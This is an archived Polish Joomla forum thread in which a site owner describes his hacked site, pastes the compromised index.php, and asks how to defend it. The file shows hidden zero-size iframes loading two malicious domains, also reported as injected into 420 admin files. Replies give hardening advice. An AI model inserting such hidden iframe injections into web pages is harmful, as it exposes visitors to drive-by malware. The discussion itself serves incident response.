PDA

Zobacz pełną wersję : Próba schakowania strony w Joomla! 1.5.6


biznes24
15-08-2008, 15:43
Witam, 12-08-2008 moja strona w joomli 1.5.4 została schakowana Panel Admina został przejęty, Odzyskałem Panel i zrobiłem UPDATE do wersji 1.5.6 Ale ponownie zatakowali mnie Turki ale tym razem dokońca im się nie udało. Wchodząć na główną stronę joomli dostaje komunikat
Parse error: syntax error, unexpected '<' in /var/www/web26/web/index.php on line 89 Wiem że zmienili plik index.php - oto ten plik zmieniony
<?php
/**
* @version $Id: index.php 10381 2008-06-01 03:35:53Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>Jak się zabezpieczyć przed takimi atakami? Proszę o pomoc.
inkos
16-08-2008, 17:02
Aktualna Joomla PRZED a nie PO ataku. Czysty komputer z ktorego laczysz sie z zapleczem witryny. Stala lektura watkow dotyczacych bezpieczenstwa na joomla.org oraz na forum.joomla.org. Aktualne komponenty. Itd itp.
crazyluki
17-08-2008, 12:47
pomoc.joomla.pl dział częste pytania> bezpieczeństwo - są tam artykuły w których masz opisane co powinieneś teraz zrobić :)
biznes24
18-08-2008, 14:18
Więc stało się co przewidziałem, strona pod 1.5.6 został schakowana :( Wcześniej umieścili taki kod

<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> w katalogu "administrator" w każdym pliku, a konkretnie w 420 plikach. Wchodząc na te linki firefox i google zglaszają je jako strony atakujące. Chciałem się zapytać czy zrobili to przed wersją 1.5.6 A drugie pytanie jest takie czy dając właściciela plików www-data jest bezpieczne?
crazyluki
18-08-2008, 14:21
prawdopodobnie strona została shackowana już wcześniej a Ty nie skorzystałeś z tego poradnika choć zalecałem jego lekturę
http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,view/id,25/Itemid,53/

jeśli miałeś wcześniej ustawione jakieś hasła (ftp, mysql) i ich nie zmieniles to na 100miljonow procent bot teraz normalnie wszedł używając w tym celu np połączenia ftp żeby nadpisać wszystkie pliki:)

http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,view/id,32/Itemid,53/ jeszcze to przeczytaj:)
biznes24
18-08-2008, 14:31
prawdopodobnie strona została shackowana już wcześniej a Ty nie skorzystałeś z tego poradnika choć zalecałem jego lekturę
http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,view/id,25/Itemid,53/
jeśli miałeś wcześniej ustawione jakieś hasła (ftp, mysql) i ich nie zmieniles to na 100miljonow procent bot teraz normalnie wszedł używając w tym celu np połączenia ftp żeby nadpisać wszystkie pliki:) http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,view/id,32/Itemid,53/ jeszcze to przeczytaj:)
Właśnie poprawiam te pliki, po czym zmienię na hasła, jak po tym mogę sprawdzić czy jest już bezpiecznie?
Jest taka możliwość żeby dodał sobie konta w joomli których ja nie zobaczę przez panel?
crazyluki
18-08-2008, 15:11
przeczytaj dokładnie te artykuły i już będziesz dokładnie wiedział co trzeba zrobić dalej:)